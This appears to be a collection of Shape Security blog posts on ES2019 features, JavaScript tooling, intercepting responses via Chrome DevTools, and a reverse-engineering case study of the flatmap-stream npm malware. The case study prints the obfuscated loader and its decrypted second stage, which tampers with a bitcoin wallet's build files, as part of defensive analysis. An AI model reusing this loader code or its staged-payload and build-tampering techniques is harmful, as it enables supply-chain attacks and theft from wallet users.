ES2019 features coming to JavaScript (starring us!)

Shape Security has been contributing actively to TC39 and other standards bodies for the past 4 years but this year is special for us. A significant portion of the features coming to JavaScript as part of the 2019 update are from Shape Security engineers! Shape contributes to standards bodies to ensure new features are added while taking into account evolving security implications. Anything Shape contributes outside of this broad goal is because we believe the web platform is the greatest platform ever made and we want to help it grow even better.

Thanks to everyone who contributes to TC39 and thank you Michael Ficarra (@smooshMap), Tim Disney (@disnet), and Kevin Gibbons (@bakkoting) for representing Shape.

TL;DR

The 2019 update includes quality-of-life updates to JavaScript natives, and standardizes undefined or inconsistent behavior.

Buffed: String, Array, Object, Symbol, JSON

Nerfed: Try/Catch

Adjusted: Array.prototype.sort, Function.prototype.toString

Native API additions

Array.prototype.flat & .flatMap

> [ [1], [1, 2], [1, [2, [3] ] ] ].flat();
< [1, 1, 2, 1, [2, [3]]]

> [ [1], [1, 2], [1, [2, [3] ] ] ].flat(3);
< [1, 1, 2, 1, 2, 3]

The Array prototype methods flat and flatMap got unexpected attention this year, not because of their implementation, but because Shape Security engineer Michael Ficarra opened a gag pull request renaming the original method flatten to smoosh thus starting SmooshGate. Michael opened the pull request as a joke after long TC39 meetings on the topic and it ended up giving the average developer great insight into how TC39 works and under how big of a microscope proposals are placed under. When considering new features to add to JavaScript, the TC39 committee has to take two decades of existing websites and applications into account to ensure no new feature unexpectedly breaks them.

After FireFox shipped flatten in the nightly releases, users found that websites using the MooTools framework were breaking. MooTools had added flatten to the Array prototype ten years ago and now any site using MooTools risks breaking if the method changes. Since MooTools usage has declined in favor of more modern frameworks, many sites using the library are sites which are no longer actively maintained — they will not be updated even if MooTools released an updated version. SmooshGate ended up surfacing serious discussions as to what degree existing websites affect future and present innovation.

The committee concluded backwards compatibility was of higher importance and renamed the method flatten to flat. It’s a long, complicated story with an anticlimactic ending but that could be said of all specification work.

Drama aside, flat operates on an array and “flattens” nested arrays within to a configurable depth. flatMap operates similarly to the map method by applying a function to each element in the list and then calling flat() on the resulting list.

Object.fromEntries

let obj = { a: 1, b: 2 };
let entries = Object.entries(obj);
let newObj = Object.fromEntries(entries);

Object.fromEntries is a complement to the Object.entries method which allows a developer to more succinctly translate objects from one another. Object.entries takes a regular JavaScript object and returns a list of [key, value] pairs, Object.fromEntries enables the reverse.

String.prototype.trimStart & .trimEnd

> '   hello world   '.trimStart()
< "hello world   "

> '   hello world   '.trimEnd()
< "   hello world"

Major JavaScript engines had implementations of String.prototype.trimLeft() and String.prototype.trimRight() but the methods lacked a true definition in the spec. This proposal standardizes the names as trimStart and trimEnd, aligning terminology with padStart and padEnd, and aliases trimLeft and trimRight to the respective function.

Symbol.prototype.description

> let mySymbol = Symbol('my description');
< undefined

> mySymbol.description
< 'my description'

Symbol.prototype.description is an accessor for the unexposed description property. Before this addition, the only way to access the description passed into the constructor was by converting the Symbol to a string via toString() and there was no intuitive way to differentiate between Symbol() and Symbol(‘’).

Spec & Language Cleanup

Try/Catch optional binding

try {
  throw new Error();
} catch {
  console.log('I have no error')
}

Until this proposal, omitting the binding on catch resulted in an error when parsing the JavaScript source text. This resulted in developers putting in a dummy binding despite them being unnecessary and unused. This is another quality-of-life addition allowing developers to be more intentional when they ignore errors, improving the developer experience and reducing cognitive overhead for future maintainers.

Make ECMAScript a proper superset of JSON

JSON.parse describes JSON as a subset of JavaScript despite valid JSON including Unicode line separators and paragraph separators not being valid JavaScript. This proposal modifies the ECMAScript specification to allow those characters in string literals. The majority of developers will never encounter this usage but it reduces edge case handling for developers dealing with the go-between and generation of JavaScript and JSON. Now you can insert any valid JSON into a JavaScript program without accounting for edge cases in a preprocessing stage.

Well-formed JSON.stringify

> JSON.stringify('\uD834\uDF06')
< "\"𝌆\""

> JSON.stringify('\uDF06\uD834')
< "\"\\udf06\\ud834\""

This proposal rectifies inconsistencies in description and behavior for JSON.stringify. The ECMAScript spec describes JSON.stringify as returning a UTF-16 encoded JSON format string but can return values that are invalid UTF-16 and are unrepresentable in UTF-8 (specifically surrogates in the Unicode range U+D800U+DFFF). The accepted resolution is, when encoding lone surrogates, to return the code point as a Unicode escape sequence.

Stable Array.prototype.sort()

This is a change to the spec reflecting the behavior standardized by practice in major JavaScript engines. Array.prototype.sort is now required to be stable — values comparing as equal stay in their original order.

Revised Function.prototype.toString()

The proposal to revise Function.prototype.toString has been a work-in-progress for over 3 years and was another proposed and championed by Michael Ficarra due to problems and inconsistencies with the existing spec. This revision clarifies and standardizes what source text toString() should return or generate for functions defined in all the different forms. For functions created from parsed ECMAScript source, toString() will preserve the whole source text including whitespace, comments, everything.

Onward and upward

ES2015 was a big step for JavaScript with massive new changes and, because of the problems associated with a large change set, the TC39 members agreed it is more sustainable to produce smaller, yearly updates. Most of the features above are already implemented in major JavaScript engines and can be used today.

If you are interested in reading more TC39 proposals, including dozens which are in early stages, the committee makes its work available publicly on Github.com. Take a look at some of the more interesting proposals like the pipeline operator and optional chaining.

Reverse Engineering JS by example

flatmap-stream payload A

In November, the npm package event-stream was exploited via a malicious dependency, flatmap-stream. The whole ordeal was written up here and the focus of this post is to use it as a case study for reverse engineering JavaScript. The 3 payloads associated with flatmap-stream are simple enough to be easy to write about and complex enough to be interesting. While it is not critical to understand the backstory of this incident in order to understand this post, I will be making assumptions that might not be obvious if you aren’t somewhat familiar with the details.

Reverse engineering most JavaScript is more straightforward than binary executables you may run on your desktop OS – after all, the source is right in front of you – but JavaScript code that is designed to be difficult to understand often goes through a few passes of obfuscation in order to obscure its intent. Some of this obfuscation comes from what is called “minification” which is the process of reducing the overall bytecount of your source as much as possible for space saving purposes. This involves shortening of variables to single character identifiers and translating expressions like true to something shorter but equivalent like !0. Minification is mostly unique to JavaScript’s ecosystem because of its web browser origins and is occasionally seen in node packages due to a reuse of tools and is not intended to be a security measure. For basic reversal of common minification and obfuscation techniques, check out Shape’s unminify tool. Dedicated obfuscation passes may come from tools designed to obfuscate or are performed manually by the developer

The first step is to get your hand on the isolated source for analysis. The flatmap-stream package was crafted specifically to look innocent except for a malicious payload included in only one version of the package, version 0.1.1. You can quickly see the changes to the source by diffing version 0.1.2 and version 0.1.1 or even just alternating between the urls in two tabs. For the rest of the post we’ll be referring to the appended source as payload A. Below is the formatted source of payload A.

! function() {
    try {
        var r = require,
            t = process;

        function e(r) {
            return Buffer.from(r, "hex").toString()
        }
        var n = r(e("2e2f746573742f64617461")),
            o = t[e(n[3])][e(n[4])];
        if (!o) return;
        var u = r(e(n[2]))[e(n[6])](e(n[5]), o),
            a = u.update(n[0], e(n[8]), e(n[9]));
        a += u.final(e(n[9]));
        var f = new module.constructor;
        f.paths = module.paths, f[e(n[7])](a, ""), f.exports(n[1])
    } catch (r) {}
}();

First things first: NEVER RUN MALICIOUS CODE (except in insulated environments). I’ve written my own tools to help me refactor code dynamically using the Shift suite of parsers and JavaScript transformers but you can use an IDE like Visual Studio Code for the purposes of following along with this post.

When reverse engineering JavaScript it is valuable to keep the mental juggling to a minimum. This means getting rid of any expressions or statements that don’t add immediate value and also reversing the DRYness of any code that has been optimized automatically or manually. Since we’re statically analyzing the JavaScript and tracking execution in our heads, the deeper your mental stack grows the more likely it is you’ll get lost.

One of the simplest things you can do is unminify variables that are being assigned global properties like require and process, like on lines 3 and 4.

var r = require,
    p = process;

You can do this with any IDE that offers refactoring capabilities (usually by pressing “F2” over an identifier you want to rename). After that, we see a function definition, e, which appears to simply decode a hex string.

function e(r) {
    return Buffer.from(r, "hex").toString()
}

The first interesting line of code appears to import a file which comes from the result of the function e decoding the string "2e2f746573742f64617461"

var n = require(e("2e2f746573742f64617461")),

It is extremely common for deliberately obfuscated JavaScript to obscure any literal string value so that anyone who takes a passing glance won’t get alerted by particularly ominous strings or properties in clear view. Most developers recognize this is a very low hurdle so you’ll often find trivially undoable encoding in place and that’s no different here. The e function simply reverses hex strings and you can do that manually via an online tool or with your own convenience function. Even if you’re confident that you understand that the e function is doing, it’s still a good idea to not run it (even if you extract it) with input found in a malicious file because you have no guarantees that the attacker hasn’t found a security vulnerability which is triggered by the data.

After reversing that string we see that the script is including a data file, './test/data' which is located in the distributed npm package.

module.exports = [
  "75d4c87f3[...large entry cut...]68ecaa6629",
  "db67fdbfc[...large entry cut...]349b18bc6e1",
  "63727970746f",
  "656e76",
  "6e706d5f7061636b6167655f6465736372697074696f6e",
  "616573323536",
  "6372656174654465636970686572",
  "5f636f6d70696c65",
  "686578",
  "75746638"
];

After renaming n to data and deobfuscating calls to e(n[2]) to e(n[9]) we start to see a better picture of what we’re dealing with here.

(function () {
  try {
    var data = require("./test/data");
    var o = process["env"]["npm_package_description"];
    var u = require("crypto")["createDecipher"]("aes256", o);
    var a = u.update(data[0], "hex", "utf8");
    a += u.final("utf8");
    var f = new module.constructor;
    f.paths = module.paths;
    f["_compile"](a, "");
    f.exports(data[1]);
  } catch (r) {}
}());

It’s also easy to see why these strings were hidden, finding any references to decryption in a simple flatmap library would be a dead giveaway that something is very wrong.

From here we see the script is importing node.js’s “crypto” library and, after looking up the APIs, we find that the second argument to createDecipher, o here, is the password used to decrypt. Now we can rename that argument and the following return values to sensible names based on the API. Every time we find a new piece of the puzzle it’s important to immortalize it via a refactor or a comment, even if it’s a renamed variable that seems trivial. It’s very common when diving through foreign code for hours that you lose your place, get distracted, or need to backtrack because of some erroneous refactor. Using git to save checkpoints during a refactor is valuable as well but I’ll leave that decision to you. The code now looks as follows, with the e function deleted because it is no longer used along with the statement if (!o) {... because it doesn’t add value to the analysis.

(function () {
  try {
    var data = require("./test/data");
    var password = process["env"]["npm_package_description"];
    var decipher = require("crypto")["createDecipher"]("aes256", password);
    var decrypted = decipher.update(data[0], "hex", "utf8");
    decrypted += decipher.final("utf8");
    var newModuleInstance = new module.constructor;
    newModuleInstance.paths = module.paths;
    newModuleInstance["_compile"](decrypted, "");
    newModuleInstance.exports(data[1]);
  } catch (r) {}
}());

You’ll also notice I’ve renamed f to newModuleInstance. With code this short it’s not critical but with code that might be hundreds of lines long it’s important for everything to be as clear as possible.

Now payload A is largely deobfuscated and we can walk through it to understand what it does.

Line 3 imports our external data.

var data = require("./test/data");

Line 4 grabs a password out of the environment. process.env allows you to access variables from within a node script and npm_package_description is a variables that npm, node’s package manager, sets when you run scripts defined in a package.json file.

var password = process["env"]["npm_package_description"];

Line 5 creates a decipher instance with the value from npm_package_description as the password. This means that the encrypted payload can only be decrypted when this script is executed via npm and is being executed for a particular project that has, in its package.json, a specific description field. That’s going to be tough.

var decipher = require("crypto")["createDecipher"]("aes256", password);

Lines 6 and 7 decrypt the first element in our external file and store it in the variable “decrypted

var decrypted = decipher.update(data[0], "hex", "utf8");
decrypted += decipher.final("utf8");

Lines 8-11 create a new module and then feeds the decrypted data into the undocumented method _compile. This module then exports the second element of our external data file. module.exports is node’s mechanism of exposing data from one module to another, so newModuleInstance.exports(data[1]) is exposing a second encrypted payload found in our external data file.

var newModuleInstance = new module.constructor;
newModuleInstance.paths = module.paths;
newModuleInstance["_compile"](decrypted, "");
newModuleInstance.exports(data[1]);

At this point we have encrypted data that is only decryptable with a password found in a package.json somewhere and whose decrypted data gets fed into the _compile method. Now we are left with a problem: how do you decrypt data where the password is unknown? This is a non-trivial question, if it were easy to brute force aes256 encryption then we’d have more problems than an npm package being taken over. Luckily we’re not dealing with a completely unknown set of possible passwords, just any string that happened to be entered into a package.json somewhere. package.json files originated as the file format for npm package metadata so we may as well start at the official npm registry. Luckily there’s an npm package that gives us a stream of all package metadata.

There’s no guarantee our target file is located in an npm package, many non-npm projects use package.json to store configuration for node-based tools, and package.json descriptions can change from version to version but it’s a good place to start. It is possible to decrypt this payload with multiple keys resulting in garbled gibberish so we need some way of validating our decrypted payload during this brute forcing process. Since we’re dealing something that is fed to Module.prototype._compile which feeds to vm.runInThisContext we can reasonably assume that the output is JavaScript and we can use any number of JavaScript parsers to validate the data. If our password fails or if it succeeds but our parser throws an error then we need to move to the next package.json. Conveniently, Shape Security has built its own set of JavaScript parsers for use in JavaScript and Java environments. The brute force script used is here:

const crypto = require('crypto');
const registry = require('all-the-packages')
const data = require('./test-data');
const { parseScript } = require('shift-parser');

let num = 0;
const start = Date.now();
registry
  .on('package', function (pkg) {
    num++;
    const password = pkg.description;
    const decrypted = decrypt(data[0], password);
    if (decrypted && parse(decrypted)) {
      console.log(`Password is '${password}' from ${pkg.name}@${pkg.version}`);
    }
  })
  .on('end', function () {
    const end = Date.now();
    console.log(`Done. Processed ${num} package's metadata in ${(end - start) / 1000} seconds.`);
  })

function decrypt(data, password) {
  try {
    const decipher = crypto.createDecipher("aes256", password);
    let decrypted = decipher.update(data, "hex", "utf8");
    decrypted += decipher.final("utf8");
    return decrypted;
  } catch (e) {
    return false;
  }
}

function parse(input) {
  try { 
    parseScript(input);
    return true;
  } catch(e) {
    return false;
  }
}

After running this for 92.1 seconds and processing 740543 packages we come up with our password – “A Secure Bitcoin Wallet” – which successfully decodes the payload included below:

/*@@*/
module.exports = function(e) {
    try {
        if (!/build\:.*\-release/.test(process.argv[2])) return;
        var t = process.env.npm_package_description,
            r = require("fs"),
            i = "./node_modules/@zxing/library/esm5/core/common/reedsolomon/ReedSolomonDecoder.js",
            n = r.statSync(i),
            c = r.readFileSync(i, "utf8"),
            o = require("crypto").createDecipher("aes256", t),
            s = o.update(e, "hex", "utf8");
        s = "\n" + (s += o.final("utf8"));
        var a = c.indexOf("\n/*@@*/");
        0 <= a && (c = c.substr(0, a)), r.writeFileSync(i, c + s, "utf8"), r.utimesSync(i, n.atime, n.mtime), process.on("exit", function() {
            try {
                r.writeFileSync(i, c, "utf8"), r.utimesSync(i, n.atime, n.mtime)
            } catch (e) {}
        })
    } catch (e) {}
};

This was lucky. What could have been a monstrous brute forcing problem ended up needing less than a million iterations. The affected package with the key in question ended up being the bitcoin wallet Copay’s client application. The next two payloads dive deeper into the application itself and, given the target application is centered around storing bitcoins, you can probably guess where this might be going.

If you find topics like this interesting and want to read an analysis for the other two payloads or future attacks, then be sure to “like” this post or let me know on twitter at @jsoverson.

Intercepting and Modifying responses with Chrome via the Devtools Protocol

At Shape we come across many sketchy pieces of JavaScript. We find scripts that are maliciously injected into pages, they might be sent by a customer for advice, or our security teams might find a resource on the web that seems to specifically reference some aspects of our service. As part of our everyday routine, we dive into the scripts head first to understand what they’re doing and how they work. They are usually minified, often obfuscated, and always require multiple levels of modification before they are really ready for deep analysis.

Until recently, the easiest way to do this analysis was either with locally cached setups that enable manual editing or by using proxies to rewrite content on the fly. The local solution is the most convenient, but websites do not always translate perfectly to other environments and it often leads people down a rabbit hole of troubleshooting just to get productive. Proxies are extremely flexible, but are usually cumbersome and not very portable – everyone has their own custom setup for their environment and some people are more familiar with one proxy vs another. I’ve started to use Chrome and its devtools protocol in order to hook into requests and responses as they are happening and modify them on the fly. This is portable to any platform that has Chrome, bypasses a whole slew of issues, and integrates well with common JavaScript tooling. In this post, I’ll go over how to intercept and modify JavaScript on the fly using Chrome’s devtools protocol.

We’ll use node but a lot of the content is portable to your language of choice provided you have the devtools hooks easily accessible.

First off, if you’ve never explored scripting Chrome, Eric Bidelman wrote up an excellent Getting Started Guide for Headless Chrome. The tips there apply to both Headless and GUI Chrome (with one quirk I’ll address in the next section).

Launching Chrome

We’ll use the chrome-launcher library from npm to make this easy.


npm install chrome-launcher

chrome-launcher does precisely what you think it would do and you can pass the same command line switches you’re used to from the terminal unchanged (a great list is maintained here). We’ll pass the following options:

  • –window-size=1200,800
    • Automatically set the window size to something reasonable.
  • –auto-open-devtools-for-tabs
    • Automatically open up the devtools because we use them frequently.
  • –user-data-dir=/tmp/chrome-testing
    • Set a constant user data directory. (Ideally we wouldn’t need this but non-headless mode on Mac OSX doesn’t seem to allow you to intercept requests without this flag. If you know of a better way, please let me know via Twitter!)

const chromeLauncher = require('chrome-launcher');

async function main() {

  const chrome = await chromeLauncher.launch({

    chromeFlags: [

      '--window-size=1200,800',

      '--user-data-dir=/tmp/chrome-testing',

      '--auto-open-devtools-for-tabs'

    ]

  });

}

main()

Try running your script to make sure you’re able to open Chrome. You should see something like this:

Screen Shot 2018-09-13 at 10.46.26 AM

Using the Chrome Devtools Protocol

This is also referred to as the “Chrome debugger protocol,” and both terms seem to be used interchangeably in Google’s docs 🤷‍♂️. First, install the package chrome-remote-interface via npm which gives us convenient methods to interact with the devtools protocol. Make sure to have the protocol docs handy if you want to dive in more deeply.


npm install chrome-remote-interface

To use the CDP, you need to connect to the debugger port and, because we’re using the chrome-launcher library, this is conveniently accessible via chrome.port.


const protocol = await CDP({ port: chrome.port });

Many of the domains in the protocol need to be enabled first, and we’re going to start with the Runtime domain so that we can hook into the console API and deliver any console calls in the browser to the command line.


const { Runtime } = protocol;

await Promise.all([Runtime.enable()]);

Runtime.consoleAPICalled(

   ({ args, type }) =>

   console[type].apply(console, args.map(a => a.value))

);

Now when you run your script, you get a fully functional Chrome window that also outputs all of its console messages to your terminal. That’s awesome on its own, especially for testing purposes!

Intercepting requests

First, we’ll need to register what we want to intercept by submitting a list of RequestPatterns to setRequestInterception. You can intercept at either the “Request” stage or the “HeadersReceived” stage and, to actually modify a response, we’ll need to wait for “HeadersReceived”. The resource type maps to the types that you’d commonly see on the network pane of the devtools.

Don’t forget to enable the Network domain as you did with Runtime, above, by adding Network.enable() to the same array.


await Network.setRequestInterception(

  { patterns: [

    {

      urlPattern: '*.js*',

      resourceType: 'Script',

      interceptionStage: 'HeadersReceived'

    }

  ] }

);

Registering the event handler is relatively straightforward and each intercepted request comes with an ​interceptionId that can be used to query information about the request or eventually issue a continuation. Here we’re just stepping in and logging every request we intercept to the terminal.


Network.requestIntercepted(async ({ interceptionId, request}) => console.log(

    `Intercepted ${request.url} {interception id: ${interceptionId}}`

  );

  Network.continueInterceptedRequest({

    interceptionId,

  });

});

Modifying requests

To modify requests we’ll need to install some helper libraries that will encode and decode base64 strings. There are loads of libraries available; feel free to pick your own. We’ll use atob and btoa.


npm install btoa atob

The API to deal with responses is a little awkward. To handle responses, you need to include all your response logic on the request interception (as opposed to simply intercepting a response, for example) and then you have to query for the body by the interception ID. This is because the body might not be available at the time your handler is called and this allows you to explicitly wait for just what you’re looking for. The body can also come base64 encoded so you’ll want to check and decode it before blindly passing it along.


const response = await Network.getResponseBodyForInterception({ interceptionId });

const bodyData = response.base64Encoded ? atob(response.body) : response.body;

At this point you’re free to go wild on the JavaScript. Your code puts you in the middle of a response allowing you to both access the complete JavaScript that was requested and send back your modified response. Awesome! We’ll just tweak the JS by appending a console.log at the end of it so that our terminal will get a message when our modified code is executed in the browser.


const newBody = bodyData + `\nconsole.log('Executed modified resource for ${request.url}');`;

We can’t simply pass along a modified body alone because the content might conflict with the headers that were sent with the original resource. Since you’re actively testing and tweaking, you’ll probably want to start with the basics before worrying too much about any other header information you need to convey. You can access the response headers via ​responseHeaders passed to the event handler if necessary, but for now we’ll just craft our own minimal set in an array for easy manipulation and editing later.


const newHeaders = [

  'Date: ' + (new Date()).toUTCString(),

  'Connection: closed',

  'Content-Length: ' + newBody.length,

  'Content-Type: text/javascript'

];

Sending the new response down requires crafting a full, base64 encoded HTTP response (including the HTTP status line) and sending it through a rawResponse property in the object passed to continueInterceptedRequest.


Network.continueInterceptedRequest({

  interceptionId,

  rawResponse: btoa(

    'HTTP/1.1 200 OK\r\n' +

    newHeaders.join('\r\n') +

    '\r\n\r\n' +

    newBody

  )

});

Now, when you execute your script and navigate around the internet, you’ll see something like the following in your terminal as your script intercepts JavaScript and also as your modified JavaScript executes in the browser and the ​console.log()s bubble up through the hook we made at the start of the tutorial.

Screen Shot 2018-09-13 at 11.16.22 AM

The complete working code for the basic example is here:


const chromeLauncher = require('chrome-launcher');

const CDP = require('chrome-remote-interface');

const atob = require('atob');

const btoa = require('btoa');

async function main() {

  const chrome = await chromeLauncher.launch({

    chromeFlags: [

      '--window-size=1200,800',

      '--user-data-dir=/tmp/chrome-testing',

      '--auto-open-devtools-for-tabs'

    ]

  });

  const protocol = await CDP({ port: chrome.port });

  const { Runtime, Network } = protocol;

  await Promise.all([Runtime.enable(), Network.enable()]);

  Runtime.consoleAPICalled(({ args, type }) => console[type].apply(console, args.map(a => a.value)));

  await Network.setRequestInterception({ patterns: [{ urlPattern: '*.js*', resourceType: 'Script', interceptionStage: 'HeadersReceived' }] });

  Network.requestIntercepted(async ({ interceptionId, request}) => {

    console.log(`Intercepted ${request.url} {interception id: ${interceptionId}}`);

    const response = await Network.getResponseBodyForInterception({ interceptionId });

    const bodyData = response.base64Encoded ? atob(response.body) : response.body;

    const newBody = bodyData + `\nconsole.log('Executed modified resource for ${request.url}');`;

    const newHeaders = [

      'Date: ' + (new Date()).toUTCString(),

      'Connection: closed',

      'Content-Length: ' + newBody.length,

      'Content-Type: text/javascript'

    ];

    Network.continueInterceptedRequest({

      interceptionId,

      rawResponse: btoa('HTTP/1.1 200 OK' + '\r\n' + newHeaders.join('\r\n') + '\r\n\r\n' + newBody)

    });

  });

}

main();

Where to go from here

You can start by pretty printing the source code, which is always a useful way to start reverse engineering something. Yes, of course, you can do this in most modern browsers but you’ll want to control each step of modification yourself in order to keep things consistent across browsers and browser versions and to be able to connect the dots as you analyze the source. When I’m digging into foreign, obfuscated code I like to rename variables and functions as I start to understand their purpose. Modifying JavaScript safely is no trivial exercise and that’s a blog post on its own, but for now you could use something like ​unminify to undo common minification and obfuscation techniques.

You can install unminify via npm and wrap your new JavaScript body with a call to ​unminify in order to see it in action:


const unminify = require('unminify');

[...]

const newBody = unminify(bodyData + `\nconsole.log('Intercepted and modified ${request.url}');`);

We’ll dive more into the transformations in the next post. If you have any questions, comments, or other neat tricks, please reach out to me via Twitter!

Introducing Unminify

Shape Security is proud to announce the release of Unminify, our new open source tool for the automatic cleanup and deobfuscation of JavaScript.

Example

Given


function validate(i){var _=["no","ok"];return log(i),isValid(i)?_[1]:_[0]}

Unminify produces


function validate(i) {

  log(i);

  if (isValid(i)) {

    return 'ok';

  } else {

    return 'no';

  }

}

Installation and usage

Unminify is a node.js module and is available on npm. It can be installed globally with npm install -g unminifyand then executed as unminify file.js, or executed without installation as npmx unminify file.js. It is also suitable for use as a library. For more, see the readme.

Unminify supports several levels of transformation, depending on how carefully the original semantics of the program need to be tracked. Some transformations can alter some or all behavior of the program under some circumstances; these are disabled by default.

Background

JavaScript differs from most programming languages in that it has no portable compiled form: the language which humans write is the same as the language which browsers download and execute.

In modern JavaScript development, however, there is still usually at least one compilation step. Experienced JavaScript developers are probably familiar with tools like UglifyJS, which are designed to transform JavaScript source files to minimize the amount of space they take while retaining their functionality, allowing humans to write code they can read without sending extraneous information like comments and whitespace to browsers. In addition, UglifyJS transforms the underlying structure (the abstract syntax tree, or AST) of the source code: for example, it rewrites if (a) { b(); c(); } to the equivalent a&&(b(),c()) anywhere such a construct occurs in the source. Code which has been processed by such tools is generally signicantly less readable; however, this is not necessarily a goal of UglifyJS and similar minifiers.

In other cases, the explicit goal is to obfuscate code (i.e., to render it difficult for humans and/or machines to analyze). In practice, most tools for this are not significantly more advanced than UglifyJS. Such tools generally operate by transforming the source code in one or more passes, each time applying a specific technique intended to obscure the program’s behavior. A careful human can effectively undo these by hand, given time propotional to the size of the program.

Simple examples

Suppose our original program is as follows:


function validate(input) {

  log(input);

  if (isValid(input)) {

    return 'ok';

  } else {

    return 'no';

  }

}

UglifyJS will turn this into


function validate(i){return log(i),isValid(i)?"ok":"no"}

and an obfuscation tool might further rewrite this to


function validate(i){var _=["no","ok"];return log(i),isValid(i)?_[1]:_[0]}

State of the art

There are well established tools like Prettier for formatting JavaScript source by the addition of whitespace and other non-semantic syntax which improves readability. These undo half of what a tool like UglifyJS does, but because they are intended for use by developers on their own code rather than for analysis of code produced elsewhere, they do not transform the underyling structure. Running Prettier on the above example gives


function validate(i) {

  var _ = ["no", "ok"];

  return log(i), isValid(i) ? _[1] : _[0];

}

Other tools like JSTillery and JSNice do offer some amount of transformation of the structure of the code. However, in practice they tend to be quite limited. In our example above, JSTillery produces


function validate(i)

    /*Scope Closed:false | writes:false*/

    {

        return log(i), isValid(i) ? 'ok' : 'no';

    }

and JSNice produces


function validate(i) {

  var _ = ["no", "ok"];

  return log(i), isValid(i) ? _[1] : _[0];

}

Unminify

Unminify is our contribution to this space. It can undo most of the transformations applied by UglifyJS and by simple obfuscation tools. On our example above, given the right options it will fully restore the original program except for the name of the local variable input, which is not recoverable:


function validate(i) {

  log(i);

  if (isValid(i)) {

    return 'ok';

  } else {

    return 'no';

  }

}

Unminify is built on top of our open source Shift family of tools for the analysis and transformation of JavaScript.

Operation

The basic operation of Unminify consists of parsing the code to an AST, applying a series of transformations to that AST iteratively until no further changes are possible, and then generating JavaScript source from the final AST. These transformations are merely functions which consume a Shift AST and produce a Shift AST.

This processes is handled well by the Shift family, which makes it simple to write and, crucially, reason about analysis and transformation passes on JavaScript source. There is very little magic under the hood.

Unminify has support for adding additional transformation passes to its pipeline. These can be passed with the --additional-transform transform.js flag, where transform.js is a file exporting a transformation function. If you develop a transformation which is generally useful, we encourage you to contribute it!

Shift Semantics

A few months ago, Shape released Shift Semantics, the newest tool in the Shift family of ECMAScript tooling.

The Shift Semantics library defines a structure for representing the behaviour of an ECMAScript program as well as a function for deriving one of these structures from a Shift AST.

Background

While ECMAScript has many syntactic features, not every one of them maps to a unique behaviour. For instance, all static member accesses (a.b) can be represented in terms of computed member accesses on strings (a['b']), and all for loops can be written in terms of while loops. Shift Semantics defines a data structure called an abstract semantic graph (ASG) which has a node for each individual operation that an ECMAScript interpreter would need to be able to interpret all ECMAScript programs. When an ASG is created, information about the original syntactic representation is lost. Only the important bit about what that program is supposed to do remains.

Why is this useful?

Many use cases for ECMAScript tooling do not involve knowledge of the original representation of the program. For instance, if one is compiling an ECMAScript program to another lower-level language, it is convenient to define a compilation once for all loops instead of repeating much of the same code for each looping construct in the language. This greatly reduces the number of structures you have to consider for your transformation/analysis and eliminates any need for code duplication.

What does it look like?

There are 52 ASG nodes. Many of them have an obvious meaning: Loop, MemberAccess, GlobalReference, LiteralNumber, etc. Others are not as obvious. Keys is an Object.keys analogue, used to represent the for-in behaviour of retrieiving enumerable keys of an object before looping over them. RequireObjectCoercible represents the internal spec operation of the same name. Halt explicitly indicates that the program has run to completion, though it’s also allowed to be used in other places within the graph if one desires.

Update: If you’d like to see GraphViz visualisations, see the examples in Pull Request #8 or run the visualiser yourself on a program of your choosing.

How do I use it?

If you don’t already have a Shift AST for your program, you will need to use the parser to create one:

import com.shapesecurity.shift.parser.Parser;

String js = "f(0);";

// if you have a script
Script script = Parser.parseScript(js);
// if you have a module
Module module = Parser.parseModule(js);

Once you have your Shift AST, pass it to the Explicator:

import com.shapesecurity.shift.semantics.Explicator;

Semantics semantics = Explicator.deriveSemantics(program);

The Semantics object’s fields, including the ASG, can be accessed directly. One can also define a reducer, in the same way a reducer is defined over a Shift AST: subclassing the ReconstructingReducer. Note that our ASG reducers have not yet been open-sourced, but will be soon.

Limitations

Currently, WithStatements and direct calls to eval are explicated into Halt nodes. There’s no reason that these cannot be supported, but they were not part of the initial effort. Similarly, not all of ECMAScript 2015 and beyond is supported. We will be adding support for newer ECMAScript features piece by piece as development continues.

Acknowledgements

Thanks to Shape engineer Kevin Gibbons for figuring out all the hard problems during the design of the ASG.

Announcing SuperPack

Shape Security is proud to announce the release of SuperPack, a language-agnostic schemaless binary data serialisation format.

First of all, what does it mean to be schemaless?

Data serialisation formats like JSON or MessagePack encode values in a way that the structure of those values (schema) can be determined by simply observing the encoded value. These formats, like SuperPack, are said to be “schemaless”.

In contrast, a schema-driven serialisation format such as Protocol Buffers makes use of ahead-of-time knowledge of the schema to pack the encoded values into one exteremely efficent byte sequence free of any schema markers. Schema-driven encodings have some obvious downsides. The schema must remain fixed (ignoring versioning), and if the encoding party is not also the decoding party, the schema must be shared among them and kept in sync.

Choose the right tool for the job. Usually, it is better to choose a schema-driven format if it is both possible and convenient. For other occasions, we have a variety of schemaless encodings.

What separates it from the others?

In short, SuperPack payloads are very compact without losing the ability to represent any type of data you desire.

Extensibility

The major differentiator between SuperPack and JSON or bencode is that it is extensible. Almost everyone has had to deal with JSON and its very limited set of data types. When you try to JSON serialise a JS undefined value, a regular expression, a date, a typed array, or countless other more exotic data types through JSON, your JSON encoder will either give you an error or give you an encoding that will not decode back to the input value. You will never have that problem with SuperPack.

SuperPack doesn’t have a very rich set of built-in data types. Instead, it is extensible. Say we wanted to encode/decode (aka transcode) regular expressions, a data type that is not natively supported by SuperPack. This is all you have to do:

SuperPackTranscoder.extend(
  // extension point: 0 through 127
  0,
  // detect values which require this custom serialisation
  x => x instanceof RegExp,
  // serialiser: return an intermediate value which will be encoded instead
  r => [r.pattern, r.flags],
  // deserialiser: from the intermediate value, reconstruct the original value
  ([pattern, flags]) => RegExp(pattern, flags),
);

And if we want to transcode TypedArrays:

SuperPackTranscoder.extend(
  1,
  ArrayBuffer.isView,
  a => [a[Symbol.toStringTag], a.buffer],
  ([ctor, buffer]) => new self[ctor](buffer),
);

Compactness

The philosophy behind SuperPack is that, even if you cannot predict your data’s schema in advance, the data likely has structures or values that are repeated many times in a single payload. Also, some values are just very common and should have efficient representations.

Numbers between -15 and 63 (inclusive) are a single byte; so are booleans, null, undefined, empty arrays, empty maps, and empty strings. Strings which don’t contain a null (\0) character can avoid storing their length by using a C-style null terminator. Boolean-valued arrays and maps use a single bit per value.

When an encoder sees multiple strings with the same value, it will store them in a lookup table, and each reference will only be an additional two bytes. Note that this string deduplication optimisation could have been taken further to allow deduplication of arbitrary structures, but that would allow encoders to create circular references, which is something we’d like to avoid.

